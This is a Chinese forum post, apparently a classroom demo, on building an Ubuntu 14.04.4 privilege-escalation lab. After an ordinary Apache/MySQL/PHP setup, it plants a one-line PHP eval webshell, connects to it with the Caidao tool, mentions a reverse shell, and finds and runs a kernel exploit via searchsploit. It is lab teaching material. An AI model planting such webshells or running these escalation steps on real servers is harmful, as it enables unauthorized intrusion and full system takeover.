linux系统ubuntu14.04.4提权实验环境搭建
ubuntu14.04.4下载地址:链接:https://pan.baidu.com/s/1kqY3BzVop87Iid1TZJk67w
提取码:cuzt
1,安装apache<font size="5"> sudo apt-get update
sudo apt-get install apache2</font> 这时http://你机器的ip,就可以访问了。
2,安装mysql<font size="5">sudo apt-get install mysql-server php5-mysql</font> 安装过程中会要求你输入root用户的密码 安装完成后执行<font size="5">sudo mysql_install_db</font> 这句的意思是初始化数据库目录结构 安装完成后 mysql -u root -p 输入密码应该是可以进入数据库的. 指定编码创建数据库: <font size="5">CREATE DATABASE IF NOT EXISTS yourdbname DEFAULT CHARSET utf8 COLLATE utf8_general_ci;</font> 从文件导入数据: 进入指定库后,source /var/tmp/all.mysql 导出数据:<font size="5">mysqldump -u$USER -p$PASSWD -h127.0.0.1 -P3306 --routines --default-character-set=utf8 --databases mysql > db.all.sql</font>
3,安装php及一些必要的扩展 sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt php5-curl php5-imagick php5-cli 如果你想找找其它扩展可以用命令:apt-cache search php5-
4,修改默认主页修改 /etc/apache2/mods-enabled/dir.conf
把DirectoryIndex index.html index.cgi index.pl index.php index.xhtml index.htm中index.php改到最前面(可以根据自已需要)
如:DirectoryIndex index.php index.html index.cgi index.pl index.xhtml index.htm
5,重启apache2让修改生效,并测试 重启apache2:sudo service apache2 restart ubuntu14.04中apache的网站主目录是在:/var/www/html 在此目录新建info.php文件,内容为: <?php phpinfo(); ?> 访问:http://你服务器ip/info.php如果显示php环境信息,测表示安装成功6,新建站点 在apache2的配置目录(/etc/apache2/)中有两个目录是与新建站点有关的 sites-availables包含所有站点文件,即有启用的与非启用的 sites-enabled包含启用了的站点,一般来说sites-enabled里的文件是sites-availables链接 在/etc/apache2/apache2.conf文件中包含一句:IncludeOptional sites-enabled/*.conf,所以只有在sites-enabled目录中加了站点文件才会生效 在sites-availables里添加文件test.conf ln -s /etc/apache2/sites-availables/test.conf /etc/apache2/sites-enabled/test.conf7,编辑站点文件<font size="5"><VirtualHost *:80>
ServerName test.com
ServerAlias www.test.com
ServerAlias a.test.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/test
</VirtualHost></font>本机测试添加hosts记录,即可访问。8,进入/var/www/html/ 目录,新建一个一句话木马 one.php<?php
eval($_POST);
?>
9,菜刀连接这个文件。
10,终端执行 whoami 查看自己的权限
11,反弹shell
12,查看内核
uname -a13,使用kalilinux 搜索 关于ubuntu14的漏洞 exp
https://www.exploit-db.com/exploits/37292/searchsploit ubuntu 14 -w
14,执行提权exp
按照提示,下载,编译,执行
提权成功!
给学生演示,安装ssh,xshell 远程连接,搭建apache环境
sudo apt-get update
sudo apt-get install openssh-server
页:
[1]